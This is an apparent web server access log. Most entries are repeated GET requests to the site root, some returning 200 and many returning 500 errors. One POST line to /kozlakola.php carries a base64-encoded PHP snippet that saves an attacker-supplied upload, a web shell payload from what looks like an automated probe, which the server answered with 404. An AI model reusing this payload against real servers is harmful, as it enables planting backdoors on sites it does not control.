118.127.40.73 - - [04/Mar/2026:00:12:12 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [04/Mar/2026:00:17:41 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [04/Mar/2026:00:36:06 +1000] "GET / HTTP/1.1" 500 1077604 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [04/Mar/2026:00:42:08 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [04/Mar/2026:00:42:44 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [04/Mar/2026:01:01:06 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [04/Mar/2026:01:07:47 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [04/Mar/2026:01:12:11 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [04/Mar/2026:01:26:04 +1000] "GET / HTTP/1.1" 500 1077614 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [04/Mar/2026:01:32:44 +1000] "GET / HTTP/1.1" 500 1077608 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [04/Mar/2026:01:42:09 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [04/Mar/2026:01:51:02 +1000] "GET / HTTP/1.1" 500 1077614 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [04/Mar/2026:01:57:44 +1000] "GET / HTTP/1.1" 500 1077606 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [04/Mar/2026:02:12:12 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [04/Mar/2026:02:16:04 +1000] "GET / HTTP/1.1" 500 1077604 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [04/Mar/2026:02:22:44 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [04/Mar/2026:02:41:03 +1000] "GET / HTTP/1.1" 500 1077600 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [04/Mar/2026:02:42:10 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [04/Mar/2026:02:47:55 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
206.237.102.28 - - [04/Mar/2026:02:48:57 +1000] "GET / HTTP/1.1" 500 1077828 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
206.237.102.28 - - [04/Mar/2026:02:48:58 +1000] "POST /kozlakola.php?apok=aWYoaXNzZXQoJF9GSUxFU1snYXp6YXRzc2lucyddWyduYW1lJ10pKXskbmFtZSA9ICRfRklMRVNbJ2F6emF0c3NpbnMnXVsnbmFtZSddOyRhenggPSAkX0ZJTEVTWydhenphdHNzaW5zJ11bJ3RtcF9uYW1lJ107QG1vdmVfdXBsb2FkZWRfZmlsZSgkYXp4LCAkbmFtZSk7IGVjaG8gJG5hbWU7fQ== HTTP/1.1" 404 6603 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
65.108.120.157 - - [04/Mar/2026:02:52:20 +1000] "GET / HTTP/1.1" 500 1077614 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [04/Mar/2026:02:55:55 +1000] "GET / HTTP/1.1" 500 1077612 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
118.127.40.73 - - [04/Mar/2026:03:12:10 +1000] "GET / HTTP/1.1" 200 4230 "-" "Python/3.11 aiohttp/3.9.2"
65.108.120.157 - - [04/Mar/2026:03:14:27 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [04/Mar/2026:03:21:09 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
65.108.120.157 - - [04/Mar/2026:03:39:24 +1000] "GET / HTTP/1.1" 500 1077610 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36"
